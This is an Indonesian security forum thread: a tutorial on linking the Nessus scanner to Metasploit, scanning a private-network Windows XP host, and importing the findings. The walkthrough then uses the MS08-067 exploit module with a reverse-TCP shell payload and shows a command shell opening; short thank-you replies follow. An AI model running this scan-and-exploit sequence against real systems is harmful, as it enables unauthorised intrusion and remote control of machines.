Integrasi NESSUS dengan METASPLOIT
#1
Askum bro & bre sekalian ... kemarin ane membahas mengenai integrasi metasploit dengan sqlmap... kali ini ane akan memberikan sedikit pelajaran mengenai bagaimana integrasi Metasploit dengan nessus ..

hmm ane rasa teman2 sudah tau nessus... yap nessus adalah vulnerability scanner tools yang lumayan ajib

Cara menjalankan nessus di BackTrack tampaknya sudah di bahas di mari Smile

http://indonesianbacktrack.or.id/forum/s...order=desc

ok kita langsung saja ... kembali lagi ane menggunakan Operating system dracos linux untuk mencari POC

login ke nessus anda sebagai administrator

https://dracos:8834/ atau https://localhost:8834/

[Image: attachment.php?aid=47]

buat user non-admin privilege, sebagai contoh ane buat sebuah user "dracos" dengan password "msf"

kemudian buatlah sebuah policies baru .. untuk contoh kali ini ane beri nama "scann-vulner"

[Image: attachment.php?aid=48]

ok masuk ke msfconsole ...kemudian panggil plugins nessus
[hide]
[shcode=bash][email protected]:~# msfconsole

_ _
/ \ / \ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_
|/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\


=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 969 exploits - 511 auxiliary - 155 post
+ -- --=[ 261 payloads - 28 encoders - 8 nops

msf > load nessus
[*] Nessus Bridge for Metasploit 1.1
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf >[/shcode]

Sip kita berhasil memanggil plugins nessus yang di gunakan sebagai bridge antara metasploit dan nessus , kita harus mengkoneksikan user nessus dengan msf framework .. owh sesuaikan dengan user , password dan domain ente

syntax :
Code:
nessus_connect user-nessus:[email protected]:port-nessus [ok jika ssl/https]

[shcode=bash]msf > nessus_connect dracos:[email protected]:8834 ok
[*] Connecting to https://dracos:8834/ as dracos
[*] Authenticated[/shcode]

seep .. whats next ? kita dapat melihat daftar policies yang tersedia .. tentu saja akan terlihat policies yang ane buat tadi .. "scann-vulner" Wink

[shcode=bash]msf > nessus_policy_list
[+] Nessus Policy List
[+]

ID Name Comments
-- ---- --------
-1 External Network Scan
-2 Web App Tests
-3 Prepare for PCI-DSS audits (section 11.2.2)
-4 Internal Network Scan
1 scann-vulner[/shcode]

Perhatikan bahwa scann-vulner berada pada id = 1

Karena itu kita dapat memulai scann masukan perintah di bawah ini

syntax:

Code:
nessus_scan_new id-policies [nama-policies] [target]

[shcode=bash]msf > nessus_scan_new 1 scann-vulner 192.168.2.6
[*] Creating scan from policy number 1, called "scann-vulner" and scanning 192.168.2.6
[*] Scan started. uid is ad6b3b18-5dd4-43a3-5782-f6c1da60a247aeee6437aa8b0dbe[/shcode]

okey scanner berjalan di dalam background .. so kita dapat melihat status .. jadi kita dapat memantau apakah scann berjalan atau tidak ..

[shcode=bash]msf > nessus_scan_status
[+] Running Scans
[+]

Scan ID Name Owner Started Status Current Hosts Total Hosts
------- ---- ----- ------- ------ ------------- -----------
ad6b3b18-5dd4-43a3-5782-f6c1da60a
247aeee6437aa8b0dbe scann-vulner dracos 23:30 Dec 06 2012 running 0
[/shcode]

Kalau sudah selesai , kita coba melihat hasil dari scann
[shcode=bash]
msf > nessus_report_list
[+] Nessus Report List
[+]

ID Name Status Date
-- ---- ------ ----
ad6b3b18-5dd4-43a3-5782-f6c1da60a247aeee6437aa8b0dbe scann-vulner completed 23:33 Dec 06 2012[/shcode]

wokey deh .. saatnya kita mengimport hasil scann ke database agar kita dapat melihat hasilnya secara detil

syntax:
Code:
nessus_report_get [id-report]

[shcode=bash]msf > nessus_report_get ad6b3b18-5dd4-43a3-5782-f6c1da60a247aeee6437aa8b0dbe
[*] importing ad6b3b18-5dd4-43a3-5782-f6c1da60a247aeee6437aa8b0dbe
[*] 192.168.2.6
[+] Done[/shcode]

dan jika kita hendak melihat secara rinci hasilnya ...

[shcode=bash]msf > db_vulns
[-] The db_vulns command is DEPRECATED
[-] Use vulns instead[/shcode]

output :

Spoiler! :
[shcode=bash][*] Time: 2012-11-29 14:44:03 UTC Vuln: host=192.168.2.5 name=Java Applet Rhino Script Engine Remote Code Execution refs=CVE-2011-3544,OSVDB-76500,URL-http://www.zerodayinitiative.com/advisories/ZDI-11-305/,URL-http://schierlm.users.sourceforge.net/CVE-2011-3544.html
[*] Time: 2012-11-30 05:54:56 UTC Vuln: host=192.168.2.5 name=Java Signed Applet Social Engineering Code Execution refs=URL-http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf,URL-http://www.spikezilla-software.com/blog/?p=21
[*] Time: 2012-12-06 16:35:54 UTC Vuln: host=192.168.2.6 name=Microsoft Windows Installed Hotfixes refs=NSS-13855
[*] Time: 2012-12-06 16:35:50 UTC Vuln: host=192.168.2.6 name=Nessus Scan Information refs=NSS-19506
[*] Time: 2012-12-06 16:35:50 UTC Vuln: host=192.168.2.6 name=Authentication Failure - Local Checks Not Run refs=NSS-21745
[*] Time: 2012-12-06 16:35:50 UTC Vuln: host=192.168.2.6 name=Ethernet Card Manufacturer Detection refs=NSS-35716
[*] Time: 2012-12-06 16:35:50 UTC Vuln: host=192.168.2.6 name=Common Platform Enumeration (CPE) refs=NSS-45590
[*] Time: 2012-12-06 16:35:51 UTC Vuln: host=192.168.2.6 name=MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check) refs=CVE-2008-4250,BID-31874,OSVDB-49243,IAVA-2008-A-0081,MSFT-MS08-067,CWE-94,MSF-Microsoft Server Service Relative Path Stack Corruption,NSS-34477
[*] Time: 2012-12-06 16:35:51 UTC Vuln: host=192.168.2.6 name=MS05-027: Vulnerability in SMB Could Allow Remote Code Execution (896422) (uncredentialed check) refs=CVE-2005-1206,BID-13942,OSVDB-17308,MSFT-MS05-027,NSS-18502
[*] Time: 2012-12-06 16:35:51 UTC Vuln: host=192.168.2.6 name=Device Type refs=NSS-54615
[*] Time: 2012-12-06 16:35:52 UTC Vuln: host=192.168.2.6 name=MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) (uncredentialed check) refs=CVE-2012-0002,CVE-2012-0152,BID-52353,BID-52354,OSVDB-80000,OSVDB-80004,EDB-ID-18606,IAVA-2012-A-0039,MSFT-MS12-020,MSF-MS12-020 Microsoft Remote Desktop Use-After-Free DoS,NSS-58435
[*] Time: 2012-12-06 16:35:52 UTC Vuln: host=192.168.2.6 name=OS Identification refs=NSS-11936
[*] Time: 2012-12-06 16:35:52 UTC Vuln: host=192.168.2.6 name=MS10-012: Vulnerabilities in SMB Could Allow Remote Code Execution (971468) (uncredentialed check) refs=CVE-2010-0020,CVE-2010-0021,CVE-2010-0022,CVE-
2010-0231,BID-38049,BID-38051,BID-38054,BID-38085,OSVDB-62253,OSVDB
62254,OSVDB-62255,OSVDB-62256,MSFT-MS10-012,CWE-310,CWE-264,NSS-47556
[*] Time: 2012-12-06 16:35:53 UTC Vuln: host=192.168.2.6 name=MS10-054: Vulnerabilities in SMB Server Could Allow Remote Code Execution (982214) (remote check) refs=CVE-2010-2550,CVE-2010-2551,CVE-2010-2552,BID-42224,BID-42263,BID-42267,OSVDB-66974,OSVDB-66975,OSVDB-66976,EDB-ID-14607,MSFT-MS10-054,MSF-Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS,NSS-48405
[*] Time: 2012-12-06 16:35:53 UTC Vuln: host=192.168.2.6 name=Microsoft Windows SMB Shares Unprivileged Access refs=CVE-1999-0519,CVE-1999-0520,BID-8026,OSVDB-299,NSS-42411,CVE-2002-1117,BID-494,OSVDB-8230,NSS-26920
[*] Time: 2012-12-06 16:35:53 UTC Vuln: host=192.168.2.6 name=MS11-020: Vulnerability in SMB Server Could Allow Remote Code Execution (2508429) (remote check) refs=CVE-2011-0661,BID-47198,OSVDB-71781,IAVA-2011-A-0050,MSFT-MS11-020,NSS-53503
[*] Time: 2012-12-06 16:35:53 UTC Vuln: host=192.168.2.6 name=SMB Use Host SID to Enumerate Local Users refs=NSS-10860
[*] Time: 2012-12-06 16:35:53 UTC Vuln: host=192.168.2.6 name=Microsoft Windows SMB LsaQueryInformationPolicy Function SID Enumeration refs=NSS-10859
[*] Time: 2012-12-06 16:35:54 UTC Vuln: host=192.168.2.6 name=Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness refs=CVE-2005-1794,BID-13818,OSVDB-17131,NSS-18405
[*] Time: 2012-12-06 16:35:54 UTC Vuln: host=192.168.2.6 name=Terminal Services Encryption Level is Medium or Low refs=NSS-57690
[*] Time: 2012-12-06 16:35:54 UTC Vuln: host=192.168.2.6 name=SMB Signing Disabled refs=NSS-57608
[*] Time: 2012-12-06 16:35:54 UTC Vuln: host=192.168.2.6 name=Terminal Services Encryption Level is not FIPS-140 Compliant refs=NSS-30218
[*] Time: 2012-12-06 16:35:54 UTC Vuln: host=192.168.2.6 name=Windows Terminal Services Enabled refs=NSS-10940
[*] Time: 2012-12-06 16:35:54 UTC Vuln: host=192.168.2.6 name=Network Time Protocol (NTP) Server Detection refs=NSS-10884
[*] Time: 2012-12-06 16:35:54 UTC Vuln: host=192.168.2.6 name=Multiple Ethernet Driver Frame Padding Information Disclosure (Etherleak) refs=CVE-2003-0001,BID-6535,OSVDB-3873,NSS-11197
[*] Time: 2012-12-06 16:35:55 UTC Vuln: host=192.168.2.6 name=Traceroute Information refs=NSS-10287
[*] Time: 2012-12-06 16:35:55 UTC Vuln: host=192.168.2.6 name=TCP/IP Timestamps Supported refs=NSS-25220
[*] Time: 2012-12-06 16:35:55 UTC Vuln: host=192.168.2.6 name=ICMP Timestamp Request Remote Date Disclosure refs=CVE-1999-0524,OSVDB-94,CWE-200,NSS-10114
[*] Time: 2012-12-06 16:35:55 UTC Vuln: host=192.168.2.6 name=MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check) refs=CVE-2006-3439,BID-19409,OSVDB-27845,MSFT-MS06-040,MSF-Microsoft Server Service NetpwPathCanonicalize Overflow,NSS-22194
[*] Time: 2012-12-06 16:35:55 UTC Vuln: host=192.168.2.6 name=Microsoft Windows SMB Guest Account Local User Access refs=CVE-1999-0505,NSS-26919
[*] Time: 2012-12-06 16:35:55 UTC Vuln: host=192.168.2.6 name=Microsoft Windows SMB LanMan Pipe Server Listing Disclosure refs=OSVDB-300,NSS-10397
[*] Time: 2012-12-06 16:35:55 UTC Vuln: host=192.168.2.6 name=Nessus Windows Scan Not Performed with Admin Privileges refs=NSS-24786
[*] Time: 2012-12-06 16:35:56 UTC Vuln: host=192.168.2.6 name=MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check) refs=CVE-2006-1314,CVE-2006-1315,BID-18863,BID-18891,OSVDB-27154,OSVDB-27155,MSFT-MS06-035,NSS-22034
[*] Time: 2012-12-06 16:35:56 UTC Vuln: host=192.168.2.6 name=Microsoft Windows SMB Shares Enumeration refs=NSS-10395
[*] Time: 2012-12-06 16:35:56 UTC Vuln: host=192.168.2.6 name=Microsoft Windows SMB Fully Accessible Registry Detection refs=NSS-10428
[*] Time: 2012-12-06 16:35:56 UTC Vuln: host=192.168.2.6 name=Microsoft Windows SMB Registry Remotely Accessible refs=NSS-10400
[*] Time: 2012-12-06 16:35:57 UTC Vuln: host=192.168.2.6 name=MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) refs=CVE-2008-4834,CVE-2008-4835,CVE-2008-4114,BID-31179,BID-33121,BID-33122,OSVDB-48153,OSVDB-52691,OSVDB-52692,MSFT-MS09-001,CWE-399,MSF-Microsoft SRV.SYS WriteAndX Invalid DataOffset,NSS-35362
[*] Time: 2012-12-06 16:35:57 UTC Vuln: host=192.168.2.6 name=MS06-008: Vulnerability in Web Client Service Could Allow Remote Code Execution (911927) (uncredentialed check) refs=CVE-2006-0013,BID-16636,OSVDB-23134,MSFT-MS06-008,NSS-20928
[*] Time: 2012-12-06 16:35:57 UTC Vuln: host=192.168.2.6 name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2012-12-06 16:35:57 UTC Vuln: host=192.168.2.6 name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2012-12-06 16:35:57 UTC Vuln: host=192.168.2.6 name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2012-12-06 16:35:58 UTC Vuln: host=192.168.2.6 name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2012-12-06 16:35:58 UTC Vuln: host=192.168.2.6 name=Microsoft Windows SMB Log In Possible refs=MSF-Microsoft Windows Authenticated User Code Execution,NSS-10394
[*] Time: 2012-12-06 16:35:58 UTC Vuln: host=192.168.2.6 name=Microsoft Windows SMB NativeLanManager Remote System Information Disclosure refs=NSS-10785
[*] Time: 2012-12-06 16:35:58 UTC Vuln: host=192.168.2.6 name=Windows NetBIOS / SMB Remote Host Information Disclosure refs=NSS-10150
[*] Time: 2012-12-06 16:35:58 UTC Vuln: host=192.168.2.6 name=Microsoft Windows SMB Service Detection refs=NSS-11011
[*] Time: 2012-12-06 16:35:58 UTC Vuln: host=192.168.2.6 name=Microsoft Windows SMB Service Detection refs=NSS-11011
[*] Time: 2012-10-07 12:50:12 UTC Vuln: host=192.168.2.7 name=Microsoft Windows Shell LNK Code Execution refs=CVE-2010-2568,OSVDB-66387,MSB-MS10-046,URL-http://www.microsoft.com/technet/security/advisory/2286198.mspx [/shcode]

wogh seep Smile:- kita sudah mendapatkan vulnerabilitas yang di dapatkan oleh nessus ... so kita bisa melihat apakah kira2 yang dapat kita injeksi ..

salah satunya kita bisa temukan

Quote:[*] Time: 2012-12-06 16:35:51 UTC Vuln: host=192.168.2.6 name=MS08-067: Microsoft Windows Server Service Crafted RPC Request
Handling Remote Code Execution (958644) (uncredentialed check) refs=CVE-
2008-4250,BID-31874,OSVDB-49243,IAVA-2008-A-0081,MSFT-MS08-067,CWE-
94,MSF-Microsoft Server Service Relative Path Stack Corruption,NSS-34477

Spoiler! :
[shcode=bash]msf auxiliary(ms06_035_mailslot) > search MS08

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/ms/ms08_059_his2006 2008-10-14 00:00:00 UTC normal Microsoft Host Integration Server 2006 Command Execution Vulnerability
exploit/windows/browser/ms08_041_snapshotviewer 2008-07-07 00:00:00 UTC excellent Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
exploit/windows/browser/ms08_053_mediaencoder 2008-09-09 00:00:00 UTC normal Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
exploit/windows/browser/ms08_070_visual_studio_msmask 2008-08-13 00:00:00 UTC normal Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow
exploit/windows/browser/ms08_078_xml_corruption 2008-12-07 00:00:00 UTC normal Internet Explorer Data Binding Memory Corruption
exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
exploit/windows/smb/smb_relay 2001-03-31 00:00:00 UTC excellent Microsoft Windows SMB Relay Code Execution


msf auxiliary(ms06_035_mailslot) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Exploit target:

Id Name
-- ----
0 Automatic Targeting


msf exploit(ms08_067_netapi) > set RHOST 192.168.2.6
RHOST => 192.168.2.6
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set LPORT 192.168.2.4
LPORT => 192.168.2.4
msf exploit(ms08_067_netapi) > set LHOST 192.168.2.4
LHOST => 192.168.2.4
msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.2.4:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.2.6
[*] Command shell session 1 opened (192.168.2.4:4444 -> 192.168.2.6:1039) at 2012-12-06 23:45:22 +0700

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>[/shcode]

sama saja jika kita hendak melihat hasilnya pada web interface nessus
[/hide]

[Image: attachment.php?aid=49]

we got the shell .. just sample for more kiddies and nothing special for me ..










FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#2
I love backtrack...amankan hehheheee...
The Wolf

#3
om zee emg top dah, thanks om =))
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#4
wew keren aman kan ahhhkkk dapet ilmu nih om zee memang mantap
alpoah@IBTeam:~#


Power Off BODOH

#5
terimakasih atas ilmunya yg sangat bermanfaat.....thanks kaka

#6
ini pake DracOs ya.. Undecided tapi gpp :-bd

#7
bisa dicoba nih thanks ilmunya

#8
makasih om zee,,, ingin coba,, semoga saya bisa Smile





Users browsing this thread: 1 Guest(s)